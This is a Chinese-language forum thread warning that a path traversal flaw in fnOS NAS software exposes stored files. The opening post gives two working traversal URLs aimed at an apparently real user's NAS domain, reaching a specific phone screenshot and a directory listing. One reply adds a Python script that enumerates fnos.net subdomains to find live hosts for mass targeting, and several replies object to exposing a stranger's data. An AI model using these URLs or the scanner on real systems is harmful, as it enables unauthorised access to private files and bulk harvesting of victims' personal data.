GoForum🌐 V2EX

飞牛 OS 漏洞会导致 nas 上所有文件泄露

Gesar · 2026-02-01 00:02 · 0 次点赞 · 11 条回复

涉密的数据永远不要联网,很早以前我发过一个帖子: https://www.v2ex.com/t/1106691

这次飞牛漏洞可以通过浏览器访问任意文件。例子:

文件访问: https://nasnas1.5ddd.com/app-center-static/serviceicon/myapp/%7B0%7D/?size=../../../../vol1/1001/Photos/MobileBackup/Xiaomi%20MI%20CC%209/DCIM/2023/10/Screenshot_2023-10-30-19-30-37-516_com.tencent.mm.jpg

目录访问: https://nasnas1.5ddd.com/app-center-static/serviceicon/myapp/%7B0%7D/?size=../../../../vol1/1001/Photos/MobileBackup/Xiaomi%20MI%20CC%209/

而且 fnos id 连接不受速度限制,也不需要验证码,攻击者可以脚本批量扫描获取大量用户文件。

11 条回复
Lentin · 2026-02-01 00:07
#1

要不你打个码呢……

Gesar · 2026-02-01 00:12
#2

如果 nas 上储存了账号密码、信用卡安全码这些敏感信息,危害更大,一旦泄露,已经不仅是修复漏洞了。千里之堤,溃于蚁穴

7789aa900 · 2026-02-01 00:17
#3

都已经发烂了,用得着你提醒吗,这样搞,显摆什么呀,真是不负责。

Gesar · 2026-02-01 00:17
#4

@7789aa900 大部分人可能只知道被植入病毒,并不知道照片这些都会泄漏。我觉得数据远比机器本身更重要,难道不是吗?

wfhtqp · 2026-02-01 00:22
#5

虽然是公开的,但你不应该直接上能访问的域名

yafoo · 2026-02-01 00:22
#6

就这样把别人图片放出来,不太好吧?

MiKing233 · 2026-02-01 00:37
#7

@yafoo 现在这个时间点已经没差别了, 该看的早被看完了, 说不定你整个 NAS 上的照片都被人拉走存一份了

chonge2018 · 2026-02-01 00:52
#8

还是给人打个码吧😂

chonge2018 · 2026-02-01 00:52
#9

还以为是测试的,假的呢

haoshuaiwang · 2026-02-01 00:57
#10

来兄弟们一起给他点压力,你下我一下明天他就关掉 fn

import socket import ssl import time

PREFIXES = [“ww”] NUM_START = 6671 NUM_END = 8899 PORT = 443

TIMEOUT = 5 DELAY = 0.8

OUTPUT_FILE = “valid_fnid.txt”

_ssl_context = ssl.create_default_context()

def tcp_check_fnid(fnid: str) -> bool:

host = f"{fnid}.fnos.net"
try:
    with socket.create_connection((host, PORT), timeout=TIMEOUT) as sock:
        with _ssl_context.wrap_socket(sock, server_hostname=host):
            return True
except Exception:
    return False

def save_hit(fnid: str):

with open(OUTPUT_FILE, "a", encoding="utf-8") as f:
    f.write(fnid + "\n")

def main():

total = len(PREFIXES) * (NUM_END - NUM_START)
checked = 0

for prefix in PREFIXES:
    for num in range(NUM_START, NUM_END):
        fnid = f"{prefix}{num}"
        checked += 1

        ok = tcp_check_fnid(fnid)
        print(f"[{checked}/{total}] {fnid} {'OK' if ok else 'FAIL'}")

        if ok:
            save_hit(fnid)

        time.sleep(DELAY)

if name == “main”:

main()
suhu · 2026-02-01 01:07
#11

你这直接露人家盘不太好吧…..里面有人家身份证支付宝收款码什么的

添加回复
你还需要 登录 后发表回复

登录后可发帖和回复

登录 注册
主题信息
作者: Gesar
发布: 2026-02-01
点赞: 0
回复: 0